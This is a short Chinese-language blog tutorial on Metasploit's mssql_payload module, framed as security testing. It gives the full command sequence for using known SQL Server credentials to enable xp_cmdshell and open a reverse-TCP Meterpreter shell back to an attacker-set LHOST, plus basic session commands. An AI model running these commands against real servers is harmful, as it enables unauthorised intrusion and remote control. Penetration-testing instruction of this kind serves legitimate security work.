Metasploit Framework - mssql_payload

前言

如果知道某台 SQL Server 的帳/密,
可以很容易地透過 Metasploit Framework 的 mssql_payload 模組來測試 SQL Server.

使用 windows/mssql/mssql_payload

use windows/mssql/mssql_payload 後,預設的 payload 是 windows/meterpreter/reverse_tcp (也可以透過 show payloads 來查看選擇要用那一項 payload)。
輸入 show options 來查看 Module 及 Payload 需要輸入那些參數,

設定要攻擊的 SQL Server ,帳/密 及透過 Payload 連回到 Client 的 IP 及 Port,
設定完成後,輸入 run 來進行測試。完整的指令如下,

1
2
3
4
5
6
7
8
9
use windows/mssql/mssql_payload
show options
set RHOSTS 10.5.0.4
set USERNAME [sqlAccountName]
set PASSWORD [sqlAccountPwd]
set LHOST [Server 連回來的電腦]
set LPORT [Server 連回來的Port]
exploit

註: RHOSTS 為 MSSQL 伺服器
註: USERNAME 為 MSSQL 伺服器的帳號
註: PASSWORD 為 MSSQL 登入者的密碼
註: LHOST 為 要讓 RHOSTS 連回來的 IP
註: 如果 SQL Server 的 xp_cmdshell 沒有啟用,會試著將它啟用。

成功的話,會建立並進入到 Meterpreter Session 1 。

meterpreter 就可以輸入 sysinfogetuid 來取得這台機器的一些資訊

如果要暫時離開這個 session 可以輸入 background 或是輸入 Ctrl + Z
輸入 sessions 可以查看目前有多少個 session

要進入某個 meterpreter session ,可以輸入 session -i [session number]

參考資源

PAYLOADS THROUGH MSSQL

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

大家好,我是亂馬客 Rainmaker,目前任職於叡揚資訊,大家也都叫我 RM 。 平常負責開發公司各產品線的加值、共用的軟體,例如 Azure, OpenAI, Chatbot, Database ... 同時 Support 公司各種技術及資安修改問題。 Blog中的內容也是個人的看法, 如果有需要討論的地方, 可以留言,或是 mail 給我 :) rainmaker_ho@gss.com.tw